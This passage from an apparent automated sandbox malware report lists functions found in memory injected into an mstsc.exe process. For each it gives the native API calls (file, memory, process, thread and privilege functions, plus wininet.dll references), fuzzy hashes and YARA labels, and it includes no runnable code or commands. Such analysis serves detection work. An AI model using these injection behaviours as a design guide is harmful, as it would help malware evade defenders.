Instruction Fuzzy Hash: A2F0FC32100512BFD6282A46DC06F23BF5BDB44770F158315F654551D1DB62F87086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mstsc.exe PID: 2196 Parent PID: 3472 mstsc.exeCOMMON

Executed Functions

Function 00AE9F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00AE4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AE4B87,007A002E,00000000,00000060,00000000,00000000), ref: 00AE9F7D

Strings

.z`, xrefs: 00AE9F6D, 00AE9F78

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 1f597f2129c5069ee047dd77d57d0e0579c517fa136a1c594c2645cb39d2a1f4
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 60F0BDB2210208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AE9FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00AE4D42,5EB6522D,FFFFFFFF,00AE4A01,?,?,00AE4D42,?,00AE4A01,FFFFFFFF,5EB6522D,00AE4D42,?,00000000), ref: 00AEA025

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 77e8f36c25c5f34f074085155e0d0230df94bea8b841b485d02ed21a6218a215
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 84F0A4B2210208ABCB14DF89DC91EEB77ADEF8C754F158248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AD2D11,00002000,00003000,00000004), ref: 00AEA149

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 3dcdcadbda6bc7cfae2c5b4725a2a6e0311edb1dfa4490faa2d045f3a81a8586
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 45F015B2210208ABCB14DF89CC81EAB77ADEF88750F118248BE0897241C630F811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00AE4D20,?,?,00AE4D20,00000000,FFFFFFFF), ref: 00AEA085

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 2044c4eb8e35b96a79a0e15ef2f141dfaa5dbdcace06a690877761df61b50ce4
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 68D01776600214ABD710EB99CC85FA77BADEF48760F154599BA189B242C570FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC986A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0030f2d4636727afec33e38d1cb46941dc42fbb4c17c01abbac4a32bf635b2f
Instruction ID: f16bab614ed94fdd57a2d2dc098f5dc0b8ccd55dd3d73b66d9a9db9b07166407
Opcode Fuzzy Hash: e0030f2d4636727afec33e38d1cb46941dc42fbb4c17c01abbac4a32bf635b2f
Instruction Fuzzy Hash: B390027128100413F11161594504707000A97D0285F95C412A0416558D9697D953B161

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC984A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f4054a47c2f0d1c4ff80579f38e694363176076e026425e367fb2e20666aaee
Instruction ID: 27154a0dc604d84c713ff5d8159214234534c15f3f1ccb6a44dcd13f56894967
Opcode Fuzzy Hash: 4f4054a47c2f0d1c4ff80579f38e694363176076e026425e367fb2e20666aaee
Instruction Fuzzy Hash: D29002612C2041527545B15944045074007A7E0285B95C012A1406950C8567E857E661

Uniqueness

Uniqueness Score: -1.00%

Function 04FC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC95DA

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e67bdd65453d6e7f00d1c8e9402453a6ca92f4f5b98c00c1376d857b02052b51
Instruction ID: 6586b9e0afcec2b373ded3ae12800db5f3a42c8080ce4f03c45ab9359d27a4b3
Opcode Fuzzy Hash: e67bdd65453d6e7f00d1c8e9402453a6ca92f4f5b98c00c1376d857b02052b51
Instruction Fuzzy Hash: 089002A128200003610571594414616400B97E0245F55C021E1006590DC566D8927165

Uniqueness

Uniqueness Score: -1.00%

Function 04FC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC99AA

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 579cc19b1ea0f02ee428ace65ab66cc15485fa799a0b1b5b8dcd87bc590e514a
Instruction ID: ce19977915c0f5ddfe5295342acb0dc3d7810014215b6c702beaddf0642c2cbb
Opcode Fuzzy Hash: 579cc19b1ea0f02ee428ace65ab66cc15485fa799a0b1b5b8dcd87bc590e514a
Instruction Fuzzy Hash: 159002A13C100442F10061594414B060006D7E1345F55C015E1056554D865ADC537166

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC954A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7d582c8da8986ec3139ad6242cd790d939cee1b0c00b5f090e4630bbadf0df5a
Instruction ID: a7d78df90ad428d2096a1a30ccfcdf88558c81a37b0615d2f46834677c243095
Opcode Fuzzy Hash: 7d582c8da8986ec3139ad6242cd790d939cee1b0c00b5f090e4630bbadf0df5a
Instruction Fuzzy Hash: 3F900265291000032105A5590704507004797D5395755C021F1007550CD662D8626161

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC991A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d129ae098c5e6b3ac90040ba69ecae94b12f29ec94525f93340630617322a493
Instruction ID: b8d8ff2a3203a0325aaced6c8aa4413f1765794e3138153d7f63bb9003eb8724
Opcode Fuzzy Hash: d129ae098c5e6b3ac90040ba69ecae94b12f29ec94525f93340630617322a493
Instruction Fuzzy Hash: 979002B128100402F14071594404746000697D0345F55C011A5056554E869ADDD676A5

Uniqueness

Uniqueness Score: -1.00%

Function 04FC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC96EA

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d25d736f9ef35254337c9a4081e8ec777d81db89488229117ad87eb0ab557b22
Instruction ID: 4fe9edf033aa9a6c5d53bee51a07d11e732ddc332210e1d8f26da5d64457c807
Opcode Fuzzy Hash: d25d736f9ef35254337c9a4081e8ec777d81db89488229117ad87eb0ab557b22
Instruction Fuzzy Hash: A490027128108802F1106159840474A000697D0345F59C411A4416658D86D6D8927161

Uniqueness

Uniqueness Score: -1.00%

Function 04FC96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC96DA

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bee1c3d7ae8c8572734db3ac4955c12732fa186b2db05281290f696314c7a190
Instruction ID: 72304d08692cef028a2ef75dc9123b5cc200aa6175d6fcda391a707883bd616a
Opcode Fuzzy Hash: bee1c3d7ae8c8572734db3ac4955c12732fa186b2db05281290f696314c7a190
Instruction Fuzzy Hash: FF90027128100842F10061594404B46000697E0345F55C016A0116654D8656D8527561

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC966A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b6d09c45ffcabc5de462faea1da4f03ed2772583a16073925dc47983ec7062e
Instruction ID: 4f1a83adcc2d355d9f8cf6dd0e869dc8219404c5a88a4304bc8e26c0e6fe53ab
Opcode Fuzzy Hash: 2b6d09c45ffcabc5de462faea1da4f03ed2772583a16073925dc47983ec7062e
Instruction Fuzzy Hash: 0790027128100802F1807159440464A000697D1345F95C015A0017654DCA56DA5A77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC9A5A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: adb57e1eac4ff0879606d040b4e5ee605e7b04fa72890a6ae63497b49b39593d
Instruction ID: 5b543bb7fd39ee128cd2f04f8230d1b56656e483dab980f3b8bec070e9978538
Opcode Fuzzy Hash: adb57e1eac4ff0879606d040b4e5ee605e7b04fa72890a6ae63497b49b39593d
Instruction Fuzzy Hash: 1C90026129180042F20065694C14B07000697D0347F55C115A0146554CC956D8626561

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC965A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9449fbf0cddc2128dc5263a6f9d3931e2553bf3648840e46bb76e40cccfdbc8
Instruction ID: d4c21dbccb09fa7d2fe81a217d7425e127e70097e9f9910722f677c852675e50
Opcode Fuzzy Hash: a9449fbf0cddc2128dc5263a6f9d3931e2553bf3648840e46bb76e40cccfdbc8
Instruction Fuzzy Hash: 8490027128504842F14071594404A46001697D0349F55C011A0056694D9666DD56B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC9FEA

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 180aae673f42e38233761945450506a44adc77a0af40526220de6aca7d6ca982
Instruction ID: 82962f47d848142694f12bb098f7e26b495fdd9d5d9a0ea154fde8ada044f3a2
Opcode Fuzzy Hash: 180aae673f42e38233761945450506a44adc77a0af40526220de6aca7d6ca982
Instruction Fuzzy Hash: 3F90027139114402F11061598404706000697D1245F55C411A0816558D86D6D8927162

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC978A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eddcd3f0c6fd657faab9c73141d75a1b9f352e338d271b38a2c80401c3fe4f6a
Instruction ID: 5c28374fd611614fada0328a61b96f96685477a4c7eb1d37a068e847d62d487a
Opcode Fuzzy Hash: eddcd3f0c6fd657faab9c73141d75a1b9f352e338d271b38a2c80401c3fe4f6a
Instruction Fuzzy Hash: 7090026929300002F1807159540860A000697D1246F95D415A0007558CC956D86A6361

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FC971A

Memory Dump Source

Source File: 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000017.00000002.507773905.000000000507B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.507819215.000000000507F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71ec8561404f1ee636b5f5b117d54649a2cb114047e99fc4a8a6b321359f93f1
Instruction ID: 1ea915042596359c1a44709d2a7214815f9ce692cddc421dc872928a8525bdc1
Opcode Fuzzy Hash: 71ec8561404f1ee636b5f5b117d54649a2cb114047e99fc4a8a6b321359f93f1
Instruction Fuzzy Hash: 2F90027128100402F10065995408646000697E0345F55D011A5016555EC6A6D8927171

Uniqueness

Uniqueness Score: -1.00%

Function 00AE8C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00AE8CF8

Strings

wininet.dll, xrefs: 00AE8CAE, 00AE8CB7
net.dll, xrefs: 00AE8CC1, 00AE8D47, 00AE8D1F, 00AE8D2B, 00AE8D53

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a9a9d6293f67a3b5665c20003389489febb6230b9d16d822ec0c81bfd431679a
Instruction ID: a6ec3e2b0a38bff0148ec5ea02b6696f9aacb8d61e977265b48e5f0e2eff2846
Opcode Fuzzy Hash: a9a9d6293f67a3b5665c20003389489febb6230b9d16d822ec0c81bfd431679a
Instruction Fuzzy Hash: 493183B2500684BBC724DF65C8C5FA7B7F8BB48700F10851DF62DAB241DB35A650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AE8C46, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00AE8CF8

Strings

wininet.dll, xrefs: 00AE8CAE, 00AE8CB7
net.dll, xrefs: 00AE8CC1, 00AE8D1F, 00AE8D2B

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 02bfdb1f8d08f01e80b475274589a4f2b9a7d37df90a9e1bf220d138aed63680
Instruction ID: c8e3787038f90d21832bf7a629f252195e99798b38cab1e041509c74a081ef2e
Opcode Fuzzy Hash: 02bfdb1f8d08f01e80b475274589a4f2b9a7d37df90a9e1bf220d138aed63680
Instruction Fuzzy Hash: 6421D2B1500385BBC720DF69C8C5FA7B7B4FB48700F10801DEA2D6B281DB75A650CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA232, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AD3AF8), ref: 00AEA26D

Strings

.z`, xrefs: 00AEA25C, 00AEA268

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 40c890e51c48422b4175b6b162dc77d992fd3445913b9246bd0e83db21bd8b9f
Instruction ID: 7511b7db06032d5f6c1105a322aad18e26c460745c334d842ec8a7b43b1309df
Opcode Fuzzy Hash: 40c890e51c48422b4175b6b162dc77d992fd3445913b9246bd0e83db21bd8b9f
Instruction Fuzzy Hash: 5BE0EDB0200241ABE718DF68CC45FA737ADEF883A4F014388FD091B292C231E916CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AD3AF8), ref: 00AEA26D

Strings

.z`, xrefs: 00AEA25C, 00AEA268

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 0de2d7915418ad0195b04104b6d9e2942a57f25b046480d8ab58de7f1efcc886
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 28E046B1210208ABDB18EF99CC49EA777ADEF88750F018658FE085B242C630F914CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00AD82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00AD834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00AD836B

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: dcd148f8eb9613c1c31dfcc17dcc9982b3fbba6105a6c7f3ee15f26649511bc5
Instruction ID: 5599d03911ae42336dec955c6cce7ac143d58c0d2a9a9b6efd84dfed702e3f13
Opcode Fuzzy Hash: dcd148f8eb9613c1c31dfcc17dcc9982b3fbba6105a6c7f3ee15f26649511bc5
Instruction Fuzzy Hash: 70018431A802287BEB20A6959D03FFE766C6B50F51F044115FB04BA2C1EA94690646F6

Uniqueness

Uniqueness Score: -1.00%

Function 00AD82EB, Relevance: 3.1, APIs: 2, Instructions: 54threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00AD834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00AD836B

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 362a076fb7ab1b6dd42f2c2e81453c3ac66ec421854f206ffd3ca7b5f85c3503
Instruction ID: d5baf2b1de1e57f91dbae0d3025f871fb05f76b69183e4c51d161bb422d41deb
Opcode Fuzzy Hash: 362a076fb7ab1b6dd42f2c2e81453c3ac66ec421854f206ffd3ca7b5f85c3503
Instruction Fuzzy Hash: 6101F731A802287BEB20A6949D03FFE776CAB50F21F044119FB04BE1C1DAA86A0547F5

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA392, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00ADF1A2,00ADF1A2,?,00000000,?,?), ref: 00AEA3D0

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d332437640196982e3a1d6a3851161f6068ea449bb9c51570d2badd7cf10bab4
Instruction ID: 7a73b65748f17bb94fe01eea7b9d6ed3a3221a985d19bbb0b81cc7265ac6d140
Opcode Fuzzy Hash: d332437640196982e3a1d6a3851161f6068ea449bb9c51570d2badd7cf10bab4
Instruction Fuzzy Hash: 7C018CB9600248ABCB10DF69CC90EEB77A9EF99314F118259FD0C57242C630E815CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA2AD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AEA304

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 9bb338b6230951749463fa5c9a7790c296398d1b6437924f60857836969706cc
Instruction ID: 1dd8d9b91e090208904ebbd93d440df3f4bc798724137509138cf3ab8d72f6c6
Opcode Fuzzy Hash: 9bb338b6230951749463fa5c9a7790c296398d1b6437924f60857836969706cc
Instruction Fuzzy Hash: D301F2B2214149ABCB04CF88DC80EEB77AAAF8C354F158248FA5D97201C634E8458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AEA304

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 8be30fa841ebde30880ef85c33b043da5bb00dd318ad008ced0e662df5fb5fb9
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: C801AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AE8D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00ADF020,?,?,00000000), ref: 00AE8DBC

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6d22c14480dfcbf0a49ee93e2f1a388e2ab4c86983710b7defaf55aca31f25c0
Instruction ID: 9715791417e8f68f9fb447c6d8b376360d01e93070b84d2bd7c7d534beae2aba
Opcode Fuzzy Hash: 6d22c14480dfcbf0a49ee93e2f1a388e2ab4c86983710b7defaf55aca31f25c0
Instruction Fuzzy Hash: 64E06D333803043AE320659EAC02FA7B29C9B95B31F54002AFA0DEA2C1D995F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00AE4506,?,00AE4C7F,00AE4C7F,?,00AE4506,?,?,?,?,?,00000000,00000000,?), ref: 00AEA22D

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 3740771b6da03d362ceb7882f93ee2e28747792ee72cd3d97dbd1c62aff2e30a
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 4EE046B1210208ABDB14EF99CC41EA777ADEF88750F118558FE085B242C630F915CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00AEA3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00ADF1A2,00ADF1A2,?,00000000,?,?), ref: 00AEA3D0

Memory Dump Source

Source File: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: fa00271800cdd9399f3a2c0afb7aec2999227ee050e82589ff7c4b8d8a7e2d8a
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 41E01AB16002086BDB10DF49CC85EE737ADEF88650F018154BA0857241C930F8158BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00ADF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

